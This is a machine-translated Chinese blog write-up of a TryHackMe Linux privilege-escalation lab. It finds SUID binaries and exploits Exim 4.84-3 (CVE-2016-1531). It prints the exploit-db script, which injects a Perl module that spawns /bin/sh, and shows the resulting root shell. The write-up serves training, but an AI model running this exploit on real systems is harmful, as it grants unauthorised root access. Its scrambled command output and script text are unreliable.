![[CVE-2016-1531]我们试图使用Exim 4.84.3中的漏洞来升级特权。 Tryhackme Linux Privesc写作第6部分](https://hack-lab-256.com/wp-content/uploads/2023/04/hack-lab-256-samnail-12.jpg)
这次,我们将尝试使用Exim 484.3中的漏洞来尝试“ CVE-2016-1531特权高程”。
目标机使用Tryhackme下面的房间。
“ tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc ”
本文是第6部分。
如果您想使用TryHackMe查看Linux Privesc的写入,请还检查使用Cron作业的特权高程
推荐的参考书
pochip
pochip
作者:贾斯汀·塞茨(Justin Seitz),作者:蒂姆·阿诺德(Tim Arnold),监督者:曼塔尼·诺布塔卡(Mantani Nobutaka),翻译:arai yu,翻译:卡卡拉·hirosei(Kakara Hirosei),翻译:村上
¥3,520 (截至12:26在07/09/2025 |亚马逊研究)
pochip
作者:Tokumaru Hiroshi
¥3,520 (截至2025/07/12 00:44 |亚马逊研究)
pochip
目录
准备
首先,启动目标机器。
如果您使用的是TryHackme,请选择“启动机器”。
如果显示IP地址如下所示,您可以启动它!
这次,在您能够连接到目标计算机之后,特权升级将发生,因此请检查可以通过SSH连接的点。
┌ - ─(hacklab㉿hacklab) - [〜]└─$ ssh user@10.10.52.40 user@10.10.10.52.40's密码:Linux Debian 2.6.32-5-AMD64#1 SMP TUE 5月13日16:34:34:35 UTC 2014 X86_64 X86_64 X86_64 X86_64 X86_64 X86_64 INDEBIAN GNU/Linu-linu-linu/linu/linu/linu/linu/linu/linu/linu/linU在/usr/share/doc/*/版权所有的单个文件中描述了每个程序的确切分发术语。在适用法律允许的范围内,Debian GNU/Linux绝对没有保修。上次登录:Sun Apr 9 08:54:59 2023来自IP-10-18-110-90.EU-WEST-1.com.popute.internal用户@debian:〜$访问权限后,预先准备就完成了。
CVE-2016-1531使用EXIM 484.3中使用漏洞的特权高程
一旦走了这么远,请尝试实际提高自己的特权。
什么是suid/sgid?
CVE-2016-1531使用SUID/SGID机制。
首先,让我们简要了解SUID和SGID。
- UID:在Linux中,用户由称为UID的ID号管理。
- SUID:如果您有执行权限,则在执行文件时,将使用所有者的权限执行。
- SGID:如果您有执行权限,则在执行文件时,将在文件拥有的组的权限下执行。
查找漏洞
因此,让我们从寻找漏洞开始。
我们将寻找SUID/SGID可执行文件。
user@debian:〜$ find / -type f -a \(-perm -u+s -o -perm -g+s \)-exec ls -l {} \; 2> /dev/null -rwxr-sr-x 1 root shadow 19528 Feb 15 2011 /usr/bin/expiry -rwxr-sr-x 1 root ssh 108600 Apr 2 2014 /usr/bin/ssh-agent -rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh -rwsr-xr-x 2 root root 168136 2016年1月5日/usr/bin/sudo -rwxr-sr-x 1根TTY 11000 2010年6月17日/usr/bin/bsd/bsd-write -rwxr-sr-x 1 root crontab 35040 dec 18 2010/usr/usr/usr/bin/crontab-rwsr-rwsr-xr-xr-xr-xr-xr-xr-xr-xr-xr-xr-xr-x rwsr-xr-x root 32 2011/usr 321 2011/usr -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudoedit -rwxr-sr-x 1 root shadow 56976 Feb 15 2011 /usr/bin/chage -rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd -rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd -rwsr-xr-x 1根39856 2011年2月15日/usr/bin/bin/chfn -rwxr-sr-x 1根TTY TTY TTY 12000 2011年1月25日/usr/bin/bin/bin/bin/bin/rwsr-sr-x 1 root starts 9861 5月14日2017年5月14日2017/usr/usr/usr/bin/susr-s s r--sr-sr--sr-sr--88 3 3 3 3 3 33 2017年5月14日/usr/local/bin/suid-env -rwsr-sr-x 1根人员6899 2017年5月14日/usr/local/bin/bin/suid-env2 -rwsr-xr-xr-xr-x 1 root 963691 2017年5月13日2017年5月13日/usr/lib/弹出/dmcrypt-get-device -rwsr-xr-x 1根212128 APR 2 2014/usr/lib/lib/lib/openssh/ssh-keysign -rwsr-xr-xr-xr-xr-x 1 root 10592 root 10592 2016年2月15日 /bin/ping6 -rwsr-xr-x 1 root root 34248 Oct 14 2010 /bin/ping -rwsr-xr-x 1 root root 78616 Jan 25 2011 /bin/mount -rwsr-xr-x 1 root root 34024 Feb 15 2011 /bin/su -rwsr-xr-x 1 root root 53648 Jan 25 2011 /bin/umount -rwxr-sr-x 1 root Shadow 31864 2011年10月17日 /sbin /unix_chkpwd -rwsr-xr-x 1根94992 2014年12月13日 /sbin/mount.nfs不要错过“/usr/sbin/exim-4.84-3”中可以使用suid/sgid执行的文件列表中。
接下来,利用DB中的“ Exim-4.48-3”漏洞
我认为我们已经发现“ CVE-2016-1531”将受到漏洞DB的打击。
一旦走了这么远,您要做的就是运行exploit-db中列出的外壳。
CVE-2016-1531使用EXIM 484.3的特权高程
现在,让我们创建目标计算机上漏洞DB中列出的外壳。
对于Tryhackme,它已经在下面创建。
用户@debian:〜$ cat/home/user/tools/suid/exim/cve-2016-1531.sh#!/bin/bin/sh#cve-cve-2016-1531 exim <= 4.84-3本地root exploit#====争论-PS。 ## eg#[奇妙@localhost tmp] $ ./cve-2016-1531.sh#[CVE-2016-1531本地根源漏洞EOF包根;使用严格;使用警告;系统(“/bin/sh”); eof perl5lib =/tmp perl5opt = -mroot/usr/exim/bin/exim -ps -ps最后,只需运行您创建的外壳即可。
user@debian:〜$ /home/user/tools/suid/exim/cve-2016-1531.sh [CVE-2016-1531本地root Exploit SH-4.1#Whoami Root我能够成功获得根特权。
概括
这次,我们尝试了“ CVE-2016-1531使用Exim 484.3中的漏洞的特权提升”。
完成侦察后,您只需执行exploit-db中提到的内容,就很容易。
就是说,您会注意到什么时候实际侦察。 。 。我觉得还有更多的学习。
参考和站点
- -
![[hackthebox]如果“发生httpclient类型的错误:: ceartiveTimeouterror发生,则执行消息已过期”该怎么办”](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306]我列举了共享的桑巴舞,操纵脆弱的版本,并通过操纵路径变量来升级特权! Tryhackme Kenobi写作](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[用于初学者的永久CTF] SetoDanote CTF Web写入!建议获得CTF的感觉!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TRYHACKME]我们使用Wireshark进行了数据包分析,以研究SSH-Backdoor的侵入! aterpass2写入](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763]燃料CMS 1.4.1-我将远程代码执行(1)转换为Python 3并入侵它! Tryhackme Ignite写作](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[tryhackme]我使用ssh2john从私钥中提取哈希,并用开膛手约翰(John The Ripper)入侵密码!立交桥写入](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[tryhackme]我尝试渗透带有ret2ESP攻击的Windows机器(缓冲区溢出)!头脑风暴写作](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)